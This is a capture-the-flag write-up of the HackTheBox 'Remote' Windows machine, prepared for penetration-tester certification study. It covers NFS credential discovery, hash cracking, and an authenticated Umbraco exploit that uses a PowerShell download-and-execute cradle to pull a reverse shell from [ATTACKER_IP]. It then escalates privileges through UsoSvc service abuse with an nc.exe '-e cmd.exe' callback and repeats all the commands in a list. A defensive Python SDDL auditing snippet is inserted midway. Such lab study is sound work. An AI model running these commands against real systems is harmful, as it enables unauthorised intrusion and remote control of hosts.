We covered the HackTheBox Remote machine as part of the CREST CRT (Registered Penetration Tester) track. We demonstrated Umbraco CMS exploitation and more than one path to escalate privileges on Windows.

Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using `psexec` with these credentials returns a SYSTEM shell.


Initial Enumeration

I started with an Nmap scan, which revealed open ports, including Port 80 (HTTP), Port 2049 (NFS), and SMB ports (445, 135, 139). I decided to begin by examining the web server.

Web Server Enumeration

I identified the website as using the Umbraco Content Management System (CMS). The administration panel is typically found at the /umbraco directory. A search for exploits revealed an authenticated remote code execution vulnerability for Umbraco.

NFS Enumeration and Credential Discovery

I used the showmount -e [IP_ADDRESS] command to list NFS shares. I found an open share named site_backups with “everyone” permissions. I mounted the share locally using mount -t nfs [IP_ADDRESS]:/site_backups /mnt/.

Inside the mounted share, I found a database file named Umbraco.sdf in the updater directory. I used the strings Umbraco.sdf | less command to extract readable information from it. This revealed usernames and password hashes, and I focused on the hash for admin@htb.local.

Password Cracking

I used Hashcat to crack the SHA1 hash with hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force. This process takes time, so I didn’t run it live but noted the command.

Exploitation

I then used a Python exploit script for Umbraco. The command to run the exploit was: python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')". This command downloads and executes a PowerShell reverse shell (shell.ps1) from my attacker’s machine.

I started a Python HTTP server on my machine to serve the shell.ps1 file using python3 -m http.server [PORT]. I also set up a Netcat listener on my machine to receive the reverse shell with nc -lvp 4545. I modified the shell.ps1 script to connect back to my IP and port 4545.

Post-Exploitation – Initial Foothold

Once the reverse shell was caught, I ran systeminfo to gather system details and whoami to identify the current user, which was iis apppool\defaultapppool. I also used whoami /priv to check user privileges.

Privilege Escalation

I used the PowerUp PowerShell script for privilege escalation enumeration. I loaded the script onto the victim machine either directly in memory with iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1') or to disk (e.g., into c:\users\public) with (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1').

I then executed PowerUp by importing its functions (. .\powerup.ps1) and running Invoke-AllChecks. PowerUp identified two potential privilege escalation vectors: Juicy Potato (due to SeImpersonatePrivilege) and Service Abuse (UsoSvc). I skipped Juicy Potato as it’s a common technique.

PowerUp suggested Invoke-ServiceAbuse -Name UsoSvc. Running this command by default creates a new user and adds them to the administrators group, but this user might not be able to log in via WinRM.

I opted for a modified service abuse to get a direct privileged shell. I downloaded Netcat (nc.exe) to the victim machine (e.g., c:\users\public) and started a new Netcat listener on my attacker machine: nc -lvp 4547. Then I ran Invoke-ServiceAbuse with a custom command that connects back to that listener: Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe". This resulted in a shell as nt authority\system, which I confirmed with whoami.
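The service abuse above works only because a low-privileged identity is allowed to rewrite the service's configuration. As an added, defender-side example that is not part of the original walkthrough, the following Python audits a service security descriptor, in the SDDL form printed by `sc.exe sdshow <service>`, for exactly that condition: a broad principal (Authenticated Users, Everyone, Interactive, Users, Service) holding change-config or write-DAC/owner rights. Both SDDL strings are constructed for illustration, not captured from the Remote machine.

```python
import re

# Service-specific rights abbreviations used in SDDL ACE strings.
# DC = SERVICE_CHANGE_CONFIG (rewrite binPath/start type), WD = WRITE_DAC,
# WO = WRITE_OWNER, GA/GW = generic all/write; any of these lets the holder
# repoint the service binary. RP/WP = start/stop, which lets them trigger it.
CONFIG_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
RESTART_RIGHTS = {"RP", "WP"}
# Well-known SID abbreviations that cover low-privileged accounts such as an
# IIS application pool identity. Note "WD" in the SID slot means Everyone,
# while "WD" in the rights slot means WRITE_DAC; they are parsed separately.
BROAD_PRINCIPALS = {"AU": "Authenticated Users", "WD": "Everyone",
                    "IU": "Interactive Users", "BU": "Users", "SU": "Service"}

DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")  # D: + optional flags + ACEs
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_sddl_dacl(sddl):
    """Return [(ace_type, rights_set, sid_abbrev_or_sid)] for the DACL part."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) != 6:  # type;flags;rights;object;inherit-object;sid
            continue
        ace_type, _flags, rights, _obj, _iobj, sid = fields
        if rights.startswith("0x"):  # raw hex mask: keep as a single token
            rights_set = {rights}
        else:  # otherwise rights are a run of two-letter abbreviations
            rights_set = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append((ace_type, rights_set, sid))
    return aces


def find_abusable_aces(sddl):
    """List (principal, sorted config rights, can_restart) for risky allow ACEs."""
    findings = []
    for ace_type, rights, sid in parse_sddl_dacl(sddl):
        if ace_type != "A" or sid not in BROAD_PRINCIPALS:
            continue  # only allow-ACEs for broad principals matter here
        granted = rights & CONFIG_RIGHTS
        if granted:
            findings.append((BROAD_PRINCIPALS[sid], sorted(granted),
                             bool(rights & RESTART_RIGHTS)))
    return findings


# Constructed SDDLs: a typical hardened default, and a weak one that grants
# Authenticated Users change-config plus start/stop on the service.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")
```

Feeding the real output of `sc.exe sdshow UsoSvc` into `find_abusable_aces` reproduces the check that made PowerUp flag the service; an empty result means no broad group can rewrite its configuration.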

Other Mentioned Methods (Not Demonstrated in Detail)

I also briefly considered using Metasploit, but encountered issues with shells dying immediately. I attempted to log in with the user created by PowerUp’s default service abuse using Evil-WinRM (evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]), but it failed due to authorization issues.

Technical Commands Used

Here are the technical commands I used:

  • nmap (for initial scanning)
  • showmount -e [IP_ADDRESS]
  • mount -t nfs [IP_ADDRESS]:/site_backups /mnt/
  • strings Umbraco.sdf | less
  • hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force
  • python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"
  • python3 -m http.server [PORT]
  • nc -lvp 4545
  • systeminfo
  • whoami
  • whoami /priv
  • iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')
  • (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')
  • . .\powerup.ps1
  • Invoke-AllChecks
  • nc -lvp 4547
  • Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"
  • evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.